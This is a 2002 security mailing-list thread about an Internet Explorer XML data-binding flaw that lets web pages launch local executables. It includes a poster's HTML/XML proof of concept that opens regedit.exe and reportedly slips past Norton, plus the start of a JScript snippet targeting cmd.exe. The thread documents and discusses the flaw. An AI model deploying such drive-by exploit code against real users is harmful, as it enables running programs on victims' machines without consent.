I received the same thing on my Win98se / IE6. NAV said it was evil, but
Calc did NOT come up. But my quick and dirty web code did still get by it.
Only works on Win9x. Here is the code:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111112"
codebase="c:/windows/regedit.exe"></object>
]]>
</exploit>
</security>
</xml>
The path won't work on NT, but Norton said nothing about this. Also if
anyone knows how to use reg32.dll to call functions, they may be able to
call it here.
-----Original Message-----
From: Amer Karim [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, March 13, 2002 3:49 PM
To: [EMAIL PROTECTED]
Subject: RE: scary site
On my system, W2K Pro with IE6 and all patches, active scripting left
enabled, when I go to
http://security.greymagic.com/adv/gm001-ie/simplebind.html my Norton AV
(2002) pops up saying it detects a case of XMLid.Exploit, sticks it in the
quarantine, but it still allows the script to open the calculator. Of
course this doesn't work on my other system where the default install
locations were NOT used.
Regards,
Amer Karim
Nautilis Information Systems
Pager: 604-645-7729
e-mail: [EMAIL PROTECTED]
-----Original Message-----
From: Sprissler, Noah [mailto:[EMAIL PROTECTED]]
Sent: March 12, 2002 10:31
To: [EMAIL PROTECTED]
Subject: RE: scary site
That's interesting. I have disabled active scripting as most have suggested
and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
prompt. However, if I goto this link from Greymagic
http://security.greymagic.com/adv/gm001-ie/simplebind.html their
implementation of this works fine no matter what settings I disable. Win2k
with all patches, IE6 with all patches.
-Noah
-----Original Message-----
From: Kulla [mailto:[EMAIL PROTECTED]]
Sent: Monday, March 11, 2002 2:07 PM
To: Roy Pait; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: scary site
It seems that just affect xp I use w2k and nothing happened.
Regards
Kulla
----- Original Message -----
From: "Roy Pait" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Friday, March 08, 2002 7:51 PM
Subject: Re: scary site
> Yes, but check out this variant - save your work first. They replaced
cmd.exe with logoff.exe!
>
> http://www.fuck.org/~max/xp_rules.jpg
>
> >>> "Kulla" <[EMAIL PROTECTED]> 03/07/02 12:53PM >>>
> it is ismple java script that loads cmd.exe
>
> <SCRIPT language=JScript>
>
> var programName=new Array(
> 'c:/windows/system32/cmd.exe',
> 'c:/winnt/system32/cmd.exe',
> 'c:/cmd.exe'
> );
>
>
>
